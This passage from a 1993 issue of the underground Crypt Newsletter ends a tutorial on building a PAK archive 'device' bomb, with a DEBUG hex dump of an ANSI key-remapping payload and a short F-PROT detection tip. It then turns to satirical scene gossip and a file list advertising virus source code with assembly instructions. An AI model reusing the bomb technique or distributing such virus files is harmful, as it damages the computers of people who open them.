Q
Reason being, the 'Y' occupies that location and you want to
replace the 'Y', with a 'C', so that it spells 'CON".
'W' will tell DEBUG to write it.
'Q' will take you back to DOS.
Ah gee, Mr. Wizard... It changed!!!
-
2EC7:0100 1A 02 43 4F 4E 00 46 72-11 00 00 00 14 15 13 11 ..CON.Fr........
2EC7:0110 00 00 00 EE 1A 59 7C 39-22 11 00 00 00 1B 5B 33 .....Y|9".....[3
2EC7:0120 32 3B 36 38 3B 37 33 3B-38 32 3B 31 33 70 1A 00 2;68;73;82;13p..
2EC7:0130 FE 02 01 00 00 00 00 00-FE 00 1E B8 B9 1E 50 FF ..............P.
2EC7:0140 36 98 1C E8 DD BC E8 8E-BD 98 89 C6 E8 AF FC 85 6...............
2EC7:0150 F6 74 0A C6 06 D9 22 01-B8 01 00 EB 02 31 C0 5E .t...."......1.^
2EC7:0160 C3 31 C0 50 31 C0 50 31-C0 50 E8 3A BE 3C 00 74 .1.P1.P1.P.:.<.t
2EC7:0170 AD E8 82 BB EB A3 56 A1-CE 1C 3B 06 98 1C 7E 04 ......V...;...~.
-
Well, that's about it! Easy as falling off a log, eh?...
*REMEMBER* to PAK up the executable you wish to have
executed or all this information will have been for naught!
Ah, you know I can't leave it like this . . .
Let me give you a quick run down on how to prevent this
from happening to you . . .
Simply use the HEX codes that are representive of;
;13p
and insert them into F-PROT's user defined area. Then scan
your .PAKs, .TXTs, and anything else that can be typed . . .
Till next time,
-----ARiSToTLE
[In related news, the PAK-bomb described above has been
attributed to a wave BBS crashes in Oklahoma, according to Lee
Jackson's latest Hack Report.
Since the bomb is stored within the archive under the filename
CON - it is a "device" bomb, rather than a standard ANSI
bomb. "Turning off ANSI comments in PKZIP or other unpackers won't
stop it . . . unpacking the file causes the device CON to
be opened, and the bomb is written straight to it as a result,"
says The Hack Report, which is as good an explanation as
any.]
FICTUAL FACT/FACTUAL FICTION: THERE'S NO SECOND CHANCE WHEN
DEADLY KUNG FU IS USED FOR EVIL!
>>Urnst Kouch stupidly referred to NuKE virus-programmer Rock Steady
as French-Canadian in a recent issue of "Gray Areas" magazine.
The newsletter regrets this deplorable "ugly Americanism" and
is sorry for any mental anguish it may have caused. Rock Steady
is not, nor has he ever been, French Canadian.
>>The immortal words of the SF Bay Area punk band, "And you'll
have to admit, that I'll be rich as shit!" from it's song,
"The Money Will Roll Right In" could be applied to John
McAfee these days.
From a recent business report:
"Risk of Viruses
Given the Company's high profile in the anti-virus software market,
the Company has been a target of computer "crackers" who have
created viruses to sabotage the Company's products. While to date
these viruses have been discovered quickly and their dissemination
limited, there can be no assurance that similar viruses will not
be created in the future, that they will not cause damage to
users' computer systems and that demand for the Company's software
products will not suffer as a result. In addition, since the
Company does not control diskettes duplication by shareware
distributors or its independent agents, there is no assurance
that diskettes containing the Company's software will not be infected.
The current list price for a 1,000 computer VIRUSCAN site license
is $7,125
The current list price for a 1,000 computer CLEAN-UP site license
is $8,910
The current list price for a 1,000 computer VSHIELD site license
is $8,910
Revenue for the second quarter of 1993 were $4,340,000, a 28%
increase over revenues for the second quarter of the previous year.
Net income for the second quarter of 1993 was $1,961,000, a 26%
increase over pro forma net income for the second quarter of 1992."
Crypt Newsletter financial analyst Cando estimates the following:
"John is taking home a base salary of $250,000 and cashed out at
the public offering for . . . hold on to your pants . . . a
whopping $8,400,000 cash money! McAfee still owns 4,475,000 shares
of stock.
"Every new virus that is perceived as a threat to Fortune 100
companies will only put more cash into McAfee's pocket. Maybe it's
time for NuKE to cash in on some of this corporate fisc?"
>>Freshly weaned "cyberpunk" Billy Idol has been deemed a wuss
by the computer underground. His recent release, "Cyberpunk," has
earned praise from the computer underground along the lines of
"He makes lots of money producing meaningless noise. We have to
bash him. It's the great American past-time." This summer, Idol
has had better luck with hookers than hi-tech computing, being
unable to distance himself from Hollywood infame after being
linked to "madame-to-the stars-and-assorted-perverted-rich-
coke-snuffling-studio-execs" Heidi Fleiss. Fleiss has
been associated/seen with Idol, movie producers with a taste for
defecating upon dates and an "east coast" computer entrepeneur
who likes to use horsewhips. Call Leisure Suit Larry!
>>CARO member Vesselin Bontchev and Bulgarian virus programmer,
The Dark Avenger, have teamed up in an effort to sell the
movie rights to their first hi-tech screenplay, "The Swizzler."
"The Swizzler," now being flogged to various agents in Burbank,
CA, is a high-tech thriller set in the near future where a
mysterious computer virus called "The Swizzler" has decimated the
world's banking institutions after escaping from a laboratory
in Los Alamos, NM. With America on its knees, the Computer
Emergency Response Team rushes on an overnite jet to Bettguano,
Bulgaria, to recruit the Avenger (playing himself) in a last
ditch race against the clock to halt "The Swizzler" before the
computer scourge activates and sends the Doomsday launch codes
to the ICBM fields. Bontchev and The Dark Avenger also flew
to Cannes, sponsored by the Bulgarian bubbly wine company
Champipple, for a press the flesh campaign.
>>The Dutch virus research group, TridenT, is working on a
new electronic magazine, tentatively named "TridenTial".
This, in the face of new "anti-virus" legislation in the
low country which makes it possible to prosecute those
proven to be trading computer viruses without "educational"
permit. Look for TridenTial soon and stay tuned to this
channel.
*CAVEAT EMPTOR*
What is the Crypt Newsletter? The Crypt Newsletter is an electronic
document which delivers deft satire, savage criticism and media
analyses on topics of interest to the editor and the computing
public. The Crypt Newsletter also reviews anti-virus and
security software and republishes digested news of note to
users of such. The Crypt Newsletter ALSO supplies analysis and
complete source code to many computer viruses made expressly for
the newsletter. Source codes and DEBUG scripts of these viruses
can corrupt - quickly and irreversibly - the data on an
IBM-compatible microcomputer - particularly when handled
imperfectly. Ownership of The Crypt Newsletter can damage
your reputation, making you unpopular in heavily institutionalized
settings, rigid bureaucracy or environments where unsophisticated,
self-important computer user groups cohabit.
Files included in this issue:
CRPTLT.R17 - this electronic document
TEST.PAK - Aristotle's PAK "device" bomb demonstrator
TREKWAR.ASM - TREKWAR source code
YB-X.ASM - YB/Dick Manitoba virus source code and analysis
CLUST.ASM - TridenT Cluster virus, advanced stealth
example, and analysis
VECTOR.ASM - Kohntark's interrupt vector lister utility,
in source code
YB-X.SCR - scriptfile for YB
TREKWAR.SCR - scriptfile for TREKWAR
CLUST.SCR - scriptfile for CLUSTER
VECTOR.SCR - scriptfile for Kohntark's vector lister
To assemble programs in the newsletter directly from scriptfiles,
copy the MS-DOS program DEBUG.EXE to your work directory and
type:
DEBUG <*.scr
where *.scr is the scriptfile of interest included in this issue.
-------------------------------------------------------------------
So you like the newsletter? Maybe you want more? Maybe you
want to meet the avuncular Urnst Kouch in person! You can
access him at ukouch@delphi.com, as well as at Crypt InfoSystems:
818-683-0854/14.4.
Send all contributions to
Other fine BBS's which stock the newsletter are:
MICRO INFORMATION SYSTEMS SERVICES 1-805-251-0564
THE HELL PIT 1-708-459-7267
DRAGON'S DEN 1-215-882-1415
RIPCO ][ 1-312-528-5020
AIS 1-304-480-6083
CYBERNETIC VIOLENCE 1-514-425-4540
THE BLACK AXIS/VA. INSTITUTE OF VIRUS RESEARCH 1-804-599-4152
UNPHAMILIAR TERRITORY 1-602-PRI-VATE
THE OTHER SIDE 1-512-618-0154
REALM OF THE SHADOW 1-210-783-6526
THE BIT BANK 1-215-966-3812
DIGITAL DECAY 1-714-871-2057
*********************************************************************
Comment within the Crypt Newsletter is copyrighted by Urnst Kouch,
1993. If you choose to reprint sections of it for your own use,
you might consider contacting him as a matter of courtesy.
*********************************************************************
